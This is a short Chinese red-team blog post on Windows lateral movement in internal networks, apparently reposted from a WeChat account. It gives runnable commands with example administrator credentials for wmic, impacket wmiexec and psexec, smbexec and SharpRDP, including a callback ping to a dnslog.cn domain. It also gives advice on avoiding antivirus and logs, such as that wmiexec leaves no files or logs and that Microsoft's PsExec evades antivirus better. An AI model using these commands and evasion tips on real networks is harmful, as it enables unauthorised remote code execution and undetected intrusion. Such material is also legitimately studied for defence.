内网横向windows姿势---(上)
太久没更新文章了,今天就分享一下内网的姿势。
-
wmi
WMI,WMIHACKER
Wmi内网执行命令
wmic /node:192.168.234.152 /user:administrator /password:admin@123 process call create "cmd.exe /c ipconfig >c:ip.txt"
-
wmiexec
imacket套件中自带,常用于内网渗透中
Python wmiexec.py administrator:[email protected]
即可,相较于psexec来说,无其他文件生成,无日志产生。
若需要上传文件可以使用 lput在wmiexec中操作上传文件。
-
Wmihacker
相较于wmiexec ,单走135端口即可,不需要链接其他port,在仅开135端口时,可以用此执行,取回命令。
1是取回执行命令结果的意思 0是不取回.
-
PSEXEC
Psexec 是一个较为古老的横向操作,同样impacket 套件自带与 wmiexec不同的是,使用的时候会落地一个exe,该行为十分敏感,容易被杀软查杀,所以一般内网横向我们一般使用wmiexec等横向。
使用 impacket 组件自带,与wmiexec的使用方法类似。
但个人建议使用 微软自带的psexec,相较于impacket组件带的psexec 微软自带的免杀性更好。
psexec.exe -accepteula \192.168.234.152 -u administrator -p admin@123 "cmd.exe"
-
Smbexec
Smbexec 单走 445 ,针对在有杀软的情况下好用。
使用方法与wmi,psexec一致 但lput命令无法在此使用,一样可以使用exit 退出
SharpRDP
基于3389的横向操作
SharpRDP.exe computername=192.168.234.152 username=mo password=Admin1230.0 command="ping -n 2 j0tqu4.dnslog.cn”
所用户不在线的情况会创建一个新session
注意若是用户在线,将会锁屏.
原文始发于微信公众号(红队笔记录):内网常见横向姿势(1)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论